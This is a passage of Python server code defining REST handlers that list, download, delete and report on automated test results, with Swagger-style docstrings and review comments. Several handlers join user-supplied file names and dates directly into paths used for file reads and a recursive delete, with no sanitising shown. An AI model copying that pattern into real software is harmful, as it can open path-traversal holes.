            description: Server error
        """
        # get the user profile
        user_profile = _get_user(request=self.request)

        # checking json request on post
        try:
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        listing = RepoArchives.instance().getListingBasic(project_id=projectId)

        return {"cmd": self.request.path,
                "listing": listing,
                'project-id': projectId}
class ResultsListingFilter(HandlerCORS):
    """
    /rest/results/listing/by/id/datetime
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - results
        summary: Get the listing id of all tests results. Support date and time filtering.
        description: ''
        operationId: resultsListingIdByDatetime
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id ]
              properties:
                project-id:
                  type: integer
                date:
                  type: string
                  description: filter results by date "YYYY-MM-DD", returns only results greater than the date provided
                time:
                  type: string
                  description: filter results by time "HH:MM:SS", returns only results greater than the time provided
        responses:
          '200':
            description: all tests results with id
            schema :
              properties:
                cmd:
                  type: string
                listing:
                  type: array
                  items:
                    type: object
                project-id:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/results/listing/by/id/datetime",
                  "listing": [...]
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        profile = _get_user(request=self.request)

        # validate the json body; date/time filters are optional
        try:
            project_id = self.request.data.get("project-id")
            if project_id is None:
                raise EmptyValue("Please specify a project id")
            date_filter = self.request.data.get("date", None)
            time_filter = self.request.data.get("time", None)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(user_login=profile['login'],
                                   project_id=project_id)

        listing = RepoArchives.instance().getListingFilter(projectId=project_id,
                                                           dateFilter=date_filter,
                                                           timeFilter=time_filter)
        return {"cmd": self.request.path,
                "listing": listing,
                'project-id': project_id}
class ResultsDownloadResult(HandlerCORS):
    """
    /rest/results/download/result
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - results
        summary: Get result file in test result
        description: ''
        operationId: resultsDownloadResult
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ test-id, project-id, file-name ]
              properties:
                test-id:
                  type: string
                project-id:
                  type: integer
                file-name:
                  type: string
                save-as:
                  type: boolean
                  description: parameter only used in windows client
                save-as-name:
                  type: string
                  description: parameter only used in windows client
        responses:
          '200':
            description: image
            schema :
              properties:
                cmd:
                  type: string
                result:
                  type: string
                  description: in base64
                result-name:
                  type: string
                project-id:
                  type: string
                save-as:
                  type: boolean
                save-as-name:
                  type: string
                  description: in base64
            examples:
              application/json: |
                {
                  "cmd": "/results/download/result",
                  "result": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                  "result-name": "....",
                  "test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
                  "save-as": False,
                  "save-as-dest: ""
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '404':
            description: Test result by id not found
          '500':
            description: Server error
        """
        profile = _get_user(request=self.request)

        # validate the json body; save-as fields are optional client hints
        try:
            project_id = self.request.data.get("project-id")
            if project_id is None:
                raise EmptyValue("Please specify a project id")
            file_name = self.request.data.get("file-name")
            if file_name is None:
                raise EmptyValue("Please specify a file name")
            test_id = self.request.data.get("test-id")
            if test_id is None:
                raise EmptyValue("Please specify a project id and test id")
            save_as = self.request.data.get("save-as", False)
            save_as_dest = self.request.data.get("save-as-name", '')
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(user_login=profile['login'],
                                   project_id=project_id)

        # resolve the real test path from the test id
        found, test_path = RepoArchives.instance().findTrInCache(projectId=project_id,
                                                                 testId=test_id,
                                                                 returnProject=False)
        if found == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('Test result by id not found')

        # read the requested file, base64-encoded, without locking it
        trx_path = "%s/%s" % (test_path, file_name)
        rc, _, name_file, ext_file, _, b64_result, _, _ = RepoArchives.instance().getFile(pathFile=trx_path,
                                                                                          project=project_id,
                                                                                          addLock=False)
        if rc == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404("Result file not found")
        if rc != Context.instance().CODE_OK:
            raise HTTP_500("Unable to get file, check log in server side")

        return {"cmd": self.request.path, 'test-id': test_id, 'project-id': project_id,
                'result': b64_result, 'result-name': name_file, "result-extension": ext_file,
                'save-as': save_as, 'save-as-name': save_as_dest}
class ResultsDownloadResultUncomplete(HandlerCORS):
    """
    /rest/results/download/uncomplete
    """
    @_to_yaml
    def post(self):
        """
        tags:
            - results
        summary: Get result events event if the test is not yet terminated
        description: ''
        operationId: resultsDownloadUncomplete
        consumes:
            - application/json
        produces:
            - application/json
        parameters:
            - name: Cookie
              in: header
              description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
              required: true
              type: string
            - name: body
              in: body
              required: true
              schema:
                required: [ test-id, project-id ]
                properties:
                    test-id:
                        type: string
                    project-id:
                        type: integer
        responses:
            '200':
                description: image
                schema :
                    properties:
                        cmd:
                            type: string
                        result:
                            type: string
                            description: in base64
                        result-name:
                            type: string
                        project-id:
                            type: string
                examples:
                    application/json: |
                        {
                            "cmd": "/results/download/uncomplete",
                            "result": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                            "result-name": "....",
                            "test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced"
                        }
            '400':
                description: Bad request provided
            '403':
                description: Access denied to this project
            '404':
                description: Test result by id not found
            '500':
                description: Server error
        """
        user_profile = _get_user(request=self.request)

        # validate the mandatory body parameters
        try:
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")

            testId = self.request.data.get("test-id")
            if testId is None:
                raise EmptyValue("Please specify a test id")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # extract the real test path according the test id
        success, testPath = RepoArchives.instance().findTrInCache(
            projectId=projectId, testId=testId)
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('Test result by id not found')

        # build a temporary partial archive for the still-running test
        success, trName = RepoArchives.instance().createTrTmp(trPath=testPath)
        if success != Context.instance().CODE_OK:
            raise HTTP_500('Unable to get partial test result')

        trxPath = "%s/%s" % (testPath, trName)
        # NOTE(review): project='' here, while the completed-result download
        # handler passes the project id — presumably the tmp path is already
        # fully qualified; confirm against RepoArchives.getFile.
        success, _, nameFile, extFile, _, b64result, _, _ = RepoArchives.instance().getFile(pathFile=trxPath,
                                                                                            project='',
                                                                                            addLock=False)
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404("Result file not found")
        if success != Context.instance().CODE_OK:
            raise HTTP_500("Unable to get file, check log in server side")

        # the partial result is returned base64-encoded
        return {"cmd": self.request.path,
                'test-id': testId,
                'project-id': projectId,
                'result': b64result,
                'result-name': nameFile,
                "result-extension": extFile}
class ResultsDownloadImage(HandlerCORS):
    """
    /rest/results/download/image
    """
    @_to_yaml
    def post(self):
        """
        tags:
            - results
        summary: Get image (png or jpg) from test result
        description: ''
        operationId: resultsDownloadImage
        consumes:
            - application/json
        produces:
            - application/json
        parameters:
            - name: Cookie
              in: header
              description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
              required: true
              type: string
            - name: body
              in: body
              required: true
              schema:
                required: [ test-id, project-id, image-name ]
                properties:
                    test-id:
                        type: string
                    project-id:
                        type: integer
                    image-name:
                        type: string
        responses:
            '200':
                description: image
                schema :
                    properties:
                        cmd:
                            type: string
                        image:
                            type: string
                            description: in base64
                        project-id:
                            type: string
                examples:
                    application/json: |
                        {
                            "cmd": "/results/download/image",
                            "image": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                            "test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced"
                        }
            '400':
                description: Bad request provided
            '403':
                description: Access denied to this project
            '404':
                description: Test result not found
            '500':
                description: Server error
        """
        user_profile = _get_user(request=self.request)

        # pull and validate the mandatory body parameters
        try:
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")

            imageName = self.request.data.get("image-name")
            if imageName is None:
                raise EmptyValue("Please specify a image name")

            testId = self.request.data.get("test-id")
            if testId is None:
                raise EmptyValue("Please specify a project id and test id")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(user_login=user_profile['login'],
                                   project_id=projectId)

        # map the test id onto its on-disk result folder
        lookup_code, result_path = RepoArchives.instance().findTrInCache(projectId=projectId,
                                                                         testId=testId,
                                                                         returnProject=False)
        if lookup_code == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('test not found')

        # read the image file from the result folder, base64-encoded
        read_code, _, _, _, _, image_b64, _, _ = RepoArchives.instance().getFile(
            pathFile="%s/%s" % (result_path, imageName),
            project=projectId,
            addLock=False)
        if read_code == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404("Image not found")
        if read_code != Context.instance().CODE_OK:
            raise HTTP_500("Unable to get file, check logs in server side")

        return {"cmd": self.request.path,
                'test-id': testId,
                'project-id': projectId,
                'image': image_b64}
class ResultsRemoveById(HandlerCORS):
    """
    /rest/results/remove/by/id
    """
    @_to_yaml
    def post(self):
        """
        tags:
            - results
        summary: Remove a test result according to the test id provided
        description: ''
        operationId: resultsRemoveById
        consumes:
            - application/json
        produces:
            - application/json
        parameters:
            - name: Cookie
              in: header
              description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
              required: true
              type: string
            - name: body
              in: body
              required: true
              schema:
                required: [ test-id, project-id ]
                properties:
                    test-id:
                        type: string
                    project-id:
                        type: string
        responses:
            '200':
                description: remove result
                schema :
                    properties:
                        cmd:
                            type: string
                        message:
                            type: string
                            description: message
                        project-id:
                            type: string
                examples:
                    application/json: |
                        {
                            "cmd": "/results/remove",
                            "message": "xxxx",
                            "project-id": 25
                        }
            '400':
                description: Bad request provided
            '403':
                description: Access denied to this project
            '404':
                description: Test result not found
            '500':
                description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")

            testId = self.request.data.get("test-id")
            if testId is None:
                # was `raise HTTP_400(...)`: raised inside the try it was
                # swallowed by `except Exception` and re-wrapped as
                # "Bad request provided" — use EmptyValue like the other checks
                raise EmptyValue("Please specify a test id")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # resolve the test id to the on-disk result folder
        founded, testPath = RepoArchives.instance().findTrInCache(
            projectId=projectId, testId=testId)
        if founded == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('test not found')

        # delete the whole result folder
        success = RepoArchives.instance().delDirAll(pathFolder=testPath, project='')
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to remove test result")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_500("Unable to remove test result (missing)")
        if success == Context.instance().CODE_FORBIDDEN:
            raise HTTP_403("Cannot remove test result")

        return {"cmd": self.request.path, "message": "test result successfully removed",
                'project-id': projectId}
class ResultsRemoveByDate(HandlerCORS):
    """
    /rest/results/remove/by/date
    """
    @_to_yaml
    def post(self):
        """
        tags:
            - results
        summary: Remove all tests results according to the date provided
        description: ''
        operationId: resultsRemoveByDate
        consumes:
            - application/json
        produces:
            - application/json
        parameters:
            - name: Cookie
              in: header
              description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
              required: true
              type: string
            - name: body
              in: body
              required: true
              schema:
                required: [ date, project-id ]
                properties:
                    date:
                        type: string
                    project-id:
                        type: string
        responses:
            '200':
                description: remove result
                schema :
                    properties:
                        cmd:
                            type: string
                        message:
                            type: string
                            description: message
                        project-id:
                            type: string
                examples:
                    application/json: |
                        {
                            "cmd": "/results/remove/by/date",
                            "message": "xxxxxxx",
                            "project-id": 25
                        }
            '400':
                description: Bad request provided
            '403':
                description: Access denied to this project
            '404':
                description: Test result not found
            '500':
                description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")

            byDate = self.request.data.get("date")
            if byDate is None:
                # was `raise HTTP_400(...)`: inside the try it was caught by
                # `except Exception` and re-wrapped as "Bad request provided"
                raise EmptyValue("Please specify a date")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # results are stored under <project-id>/<date>/ — remove the whole day
        success = RepoArchives.instance().delDirAll(pathFolder="%s/%s/" %
                                                    (projectId, byDate), project='')
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to remove all tests results")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_500("Unable to remove all tests results (missing)")
        if success == Context.instance().CODE_FORBIDDEN:
            raise HTTP_403("Cannot remove all tests results")

        return {"cmd": self.request.path, "message": "all tests results successfully removed",
                'project-id': projectId}
class ResultsDetails(HandlerCORS):
    """
    /rest/results/details
    """
    @_to_yaml
    def post(self):
        """
        tags:
            - results
        summary: Get details of the test result
        description: ''
        operationId: resultsDetails
        consumes:
            - application/json
        produces:
            - application/json
        parameters:
            - name: Cookie
              in: header
              description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
              required: true
              type: string
            - name: body
              in: body
              required: true
              schema:
                required: [ test-id, project-id ]
                properties:
                    test-id:
                        type: string
                    project-id:
                        type: string
                    log-index:
                        type: integer
        responses:
            '200':
                schema :
                    properties:
                        cmd:
                            type: string
                        results:
                            type: string
                        project-id:
                            type: string
                examples:
                    application/json: |
                        {
                            "cmd": "/results/details",
                            "project-id": 25
                        }
            '400':
                description: Bad request provided
            '403':
                description: Access denied to this project
            '404':
                description: Test result not found
            '500':
                description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            testId = self.request.data.get("test-id")
            if testId is None:
                # was `raise HTTP_400("Please specify a list of test id")`:
                # raised inside the try it was swallowed by `except Exception`
                # and re-wrapped; also this endpoint takes a single test id
                raise EmptyValue("Please specify a test id")

            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")

            # optional: resume log reading from this offset (defaults to 0)
            _log_index = self.request.data.get("log-index")
            if _log_index is None:
                _log_index = 0
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(user_login=user_profile['login'],
                                   project_id=projectId)

        founded, testPath = RepoArchives.instance().findTrInCache(projectId=projectId,
                                                                  testId=testId)
        if founded == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('Test result not found')

        # gather state, final verdict and the log tail starting at _log_index
        state = RepoArchives.instance().getTrState(trPath=testPath)
        verdict = RepoArchives.instance().getTrEndResult(trPath=testPath)
        logs, logs_index = RepoArchives.instance().getTrLogs(trPath=testPath,
                                                             log_index=_log_index)
        return {"cmd": self.request.path,
                'test-id': testId,
                'test-status': state,
                'test-verdict': verdict,
                'test-logs': logs,
                'test-logs-index': logs_index}
class ResultsFollow(HandlerCORS):
    """
    /rest/results/follow
    """
    @_to_yaml
    def post(self):
        """
        tags:
            - results
        summary: Follow the result of one or several tests
        description: ''
        operationId: resultsFollow
        consumes:
            - application/json
        produces:
            - application/json
        parameters:
            - name: Cookie
              in: header
              description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
              required: true
              type: string
            - name: body
              in: body
              required: true
              schema:
                required: [ test-ids, project-id ]
                properties:
                    test-ids:
                        type: string
                    project-id:
                        type: string
        responses:
            '200':
                schema :
                    properties:
                        cmd:
                            type: string
                        results:
                            type: string
                        project-id:
                            type: string
                examples:
                    application/json: |
                        {
                            "cmd": "/results/follow",
                            "project-id": 25
                        }
            '400':
                description: Bad request provided
            '403':
                description: Access denied to this project
            '500':
                description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            # expected to be a list of test ids (iterated below)
            testIds = self.request.data.get("test-ids")
            if testIds is None:
                # was `raise HTTP_400(...)`: inside the try it was caught by
                # `except Exception` and re-wrapped as "Bad request provided"
                raise EmptyValue(
                    "Please specify a project id and a list of test id")

            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # collect state/verdict/progress for every requested test
        results = []
        for testId in testIds:
            result = {"id": testId}

            founded, testPath = RepoArchives.instance().findTrInCache(
                projectId=projectId, testId=testId)
            if founded == Context.instance().CODE_NOT_FOUND:
                raise HTTP_404('test not found')

            state = RepoArchives.instance().getTrState(trPath=testPath)
            verdict = RepoArchives.instance().getTrEndResult(trPath=testPath)
            progress = RepoArchives.instance().getTrProgress(trPath=testPath)
            result["result"] = {
                "state": state,
                "verdict": verdict,
                "progress": progress['percent']}

            description = RepoArchives.instance().getTrDescription(trPath=testPath)
            result.update(description)

            results.append(result)

        return {"cmd": self.request.path,
                "results": results, 'project-id': projectId}
class ResultsStatus(HandlerCORS):
    """
    /rest/results/status
    """
    @_to_yaml
    def post(self):
        """
        tags:
            - results
        summary: Get the status of the test (not-running, running, complete).
        description: ''
        operationId: resultsStatus
        consumes:
            - application/json
        produces:
            - application/json
        parameters:
            - name: Cookie
              in: header
              description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
              required: true
              type: string
            - name: body
              in: body
              required: true
              schema:
                required: [ test-id, project-id ]
                properties:
                    test-id:
                        type: string
                    project-id:
                        type: string
        responses:
            '200':
                description: result status of a test
                schema :
                    properties:
                        cmd:
                            type: string
                        test-status:
                            type: string
                            description: running/not-running/complete
                        test-progress:
                            type: integer
                            description: progress in percent
                        project-id:
                            type: string
                examples:
                    application/json: |
                        {
                            "cmd": "/results/status",
                            "test-status": "running",
                            "test-id": "af0b2587-459e-42eb-a4da-e3e6fa227719",
                            "test-progress": 25
                        }
            '400':
                description: Bad request provided
            '403':
                description: Access denied to this project
            '404':
                description: Test result not found
            '500':
                description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            testId = self.request.data.get("test-id")
            if testId is None:
                # was `raise HTTP_400("Please specify a list of test id")`:
                # inside the try it was swallowed by `except Exception` and
                # re-wrapped; also this endpoint takes a single test id
                raise EmptyValue("Please specify a test id")

            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        founded, testPath = RepoArchives.instance().findTrInCache(
            projectId=projectId, testId=testId)
        if founded == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('Test result not found')

        # current execution state plus progress percentage
        state = RepoArchives.instance().getTrState(trPath=testPath)
        progress = RepoArchives.instance().getTrProgress(trPath=testPath)
        return {"cmd": self.request.path,
                'test-id': testId,
                'test-status': state,
                'test-progress': progress['percent']}
class ResultsVerdict(HandlerCORS):
    """
    /rest/results/verdict
    """
    @_to_yaml
    def post(self):
        """
        tags:
            - results
        summary: Get the end result of the test (undefined, pass, fail).
        description: ''
        operationId: resultsVerdict
        consumes:
            - application/json
        produces:
            - application/json
        parameters:
            - name: Cookie
              in: header
              description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
              required: true
              type: string
            - name: body
              in: body
              required: true
              schema:
                required: [ test-id, project-id ]
                properties:
                    test-id:
                        type: string
                    project-id:
                        type: string
        responses:
            '200':
                description: tests end result
                schema :
                    properties:
                        cmd:
                            type: string
                        test-verdict:
                            type: string
                            description: undefined, pass, fail
                        project-id:
                            type: string
                examples:
                    application/json: |
                        {
                            "cmd": "/results/verdict",
                            "test-verdict": "undefined",
                            "test-id": "af0b2587-459e-42eb-a4da-e3e6fa227719"
                        }
            '400':
                description: Bad request provided
            '403':
                description: Access denied to this project
            '404':
                description: Test result not found
            '500':
                description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            testId = self.request.data.get("test-id")
            if testId is None:
                # was `raise HTTP_400("Please specify a list of test id")`:
                # inside the try it was swallowed by `except Exception` and
                # re-wrapped; also this endpoint takes a single test id
                raise EmptyValue("Please specify a test id")

            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        founded, testPath = RepoArchives.instance().findTrInCache(
            projectId=projectId, testId=testId)
        if founded == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('Test result not found')

        # final verdict only (undefined / pass / fail)
        verdict = RepoArchives.instance().getTrEndResult(trPath=testPath)
        return {"cmd": self.request.path,
                'test-id': testId,
                'test-verdict': verdict}
class ResultsReportReviews(HandlerCORS):
    """
    /rest/results/report/reviews
    """
    @_to_yaml
    def post(self):
        """
        tags:
            - reports
        summary: Get all report reviews
        description: ''
        operationId: resultsReportReviews
        consumes:
            - application/json
        produces:
            - application/json
        parameters:
            - name: Cookie
              in: header
              description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
              required: true
              type: string
            - name: body
              in: body
              required: true
              schema:
                required: [ test-id, project-id ]
                properties:
                    test-id:
                        type: string
                    project-id:
                        type: integer
                    replay-id:
                        type: string
        responses:
            '200':
                description: all test reports
                schema :
                    properties:
                        cmd:
                            type: string
                        test-report:
                            type: string
                        project-id:
                            type: string
                examples:
                    application/json: |
                        {
                            "cmd": "/results/report/reviews",
                            "test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
                            "basic-review": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                            "review": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV...."
                        }
            '400':
                description: Bad request provided
            '403':
                description: Access denied to this project
            '404':
                description: Test result not found
            '500':
                description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            testId = self.request.data.get("test-id")
            if testId is None:
                # was `raise HTTP_400(...)`: inside the try it was caught by
                # `except Exception` and re-wrapped as "Bad request provided"
                raise EmptyValue("Please specify a test id")

            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")

            _replayId = self.request.data.get("replay-id", 0)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        founded, testPath = RepoArchives.instance().findTrInCache(
            projectId=projectId, testId=testId)
        if founded == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('Test result not found')

        ret = {"cmd": self.request.path, 'test-id': testId}

        # reviews: basic (tbrp), advanced (trp) and xml (trpx);
        # a missing report is simply omitted from the response
        success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
                                                                         replayId=_replayId,
                                                                         trExt="tbrp")
        if success == Context.instance().CODE_OK:
            ret["basic-review"] = report

        success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
                                                                         replayId=_replayId,
                                                                         trExt="trp")
        if success == Context.instance().CODE_OK:
            ret["review"] = report

        success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
                                                                         replayId=_replayId,
                                                                         trExt="trpx")
        if success == Context.instance().CODE_OK:
            ret["xml-review"] = report

        return ret
class ResultsReportVerdicts(HandlerCORS):
    """
    /rest/results/report/verdicts
    """
    @_to_yaml
    def post(self):
        """
        tags:
            - reports
        summary: Get all report verdicts.
        description: ''
        operationId: resultsReportVerdicts
        consumes:
            - application/json
        produces:
            - application/json
        parameters:
            - name: Cookie
              in: header
              description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
              required: true
              type: string
            - name: body
              in: body
              required: true
              schema:
                required: [ test-id, project-id ]
                properties:
                    test-id:
                        type: string
                    project-id:
                        type: integer
                    replay-id:
                        type: string
        responses:
            '200':
                description: all test reports
                schema :
                    properties:
                        cmd:
                            type: string
                        test-report:
                            type: string
                            description: in base64 and gzipped
                        project-id:
                            type: string
                examples:
                    application/json: |
                        {
                            "cmd": "/results/reports",
                            "test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
                            "verdict": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                            "xml-verdict": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV...."
                        }
            '400':
                description: Bad request provided
            '403':
                description: Access denied to this project
            '404':
                description: Test result not found
            '500':
                description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            testId = self.request.data.get("test-id")
            if testId is None:
                # was `raise HTTP_400(...)`: inside the try it was caught by
                # `except Exception` and re-wrapped as "Bad request provided"
                raise EmptyValue("Please specify a test id")

            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")

            _replayId = self.request.data.get("replay-id", 0)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        founded, testPath = RepoArchives.instance().findTrInCache(
            projectId=projectId, testId=testId)
        if founded == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('Test result not found')

        ret = {"cmd": self.request.path, 'test-id': testId}

        # csv verdict report (trv)
        success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
                                                                         replayId=_replayId,
                                                                         trExt="trv")
        if success == Context.instance().CODE_OK:
            ret["verdict"] = report
        else:
            self.error("Error to get csv verdict report from test result")

        # xml verdict report (tvrx)
        success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
                                                                         replayId=_replayId,
                                                                         trExt="tvrx")
        if success == Context.instance().CODE_OK:
            ret["xml-verdict"] = report
        else:
            # copy-paste fix: this branch fetches the xml report, not the csv one
            self.error("Error to get xml verdict report from test result")

        return ret
class ResultsReportDesigns(HandlerCORS):
    """
    /rest/results/report/designs
    """
    @_to_yaml
    def post(self):
        """
        tags:
            - reports
        summary: Get all report designs
        description: ''
        operationId: resultsReportDesigns
        consumes:
            - application/json
        produces:
            - application/json
        parameters:
            - name: Cookie
              in: header
              description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
              required: true
              type: string
            - name: body
              in: body
              required: true
              schema:
                required: [ test-id, project-id ]
                properties:
                    test-id:
                        type: string
                    project-id:
                        type: integer
                    replay-id:
                        type: string
        responses:
            '200':
                description: all test reports
                schema :
                    properties:
                        cmd:
                            type: string
                        test-report:
                            type: string
                            description: in base64 and gzipped
                        project-id:
                            type: string
                examples:
                    application/json: |
                        {
                            "cmd": "/results/reports",
                            "test-id": "7dcc4836-e989-49eb-89b7-5ec1351d2ced",
                            "design": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV....",
                            "xml-design": "eJztfHnPq9iZ5/+R+ju8qqiVbjkV...."
                        }
            '400':
                description: Bad request provided
            '403':
                description: Access denied to this project
            '404':
                description: Test result not found
            '500':
                description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            testId = self.request.data.get("test-id")
            if testId is None:
                # was `raise HTTP_400(...)`: inside the try it was caught by
                # `except Exception` and re-wrapped as "Bad request provided"
                raise EmptyValue("Please specify a test id")

            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")

            _replayId = self.request.data.get("replay-id", 0)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        founded, testPath = RepoArchives.instance().findTrInCache(
            projectId=projectId, testId=testId)
        if founded == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404('Test result not found')

        ret = {"cmd": self.request.path, 'test-id': testId}

        # design report (trd)
        success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
                                                                         replayId=_replayId,
                                                                         trExt="trd")
        if success == Context.instance().CODE_OK:
            ret["design"] = report
        else:
            # disambiguated: both branches previously logged the same message
            self.error("Error to get design report from test result")

        # xml design report (tdsx)
        success, report = RepoArchives.instance().getTrReportByExtension(trPath=testPath,
                                                                         replayId=_replayId,
                                                                         trExt="tdsx")
        if success == Context.instance().CODE_OK:
            ret["xml-design"] = report
        else:
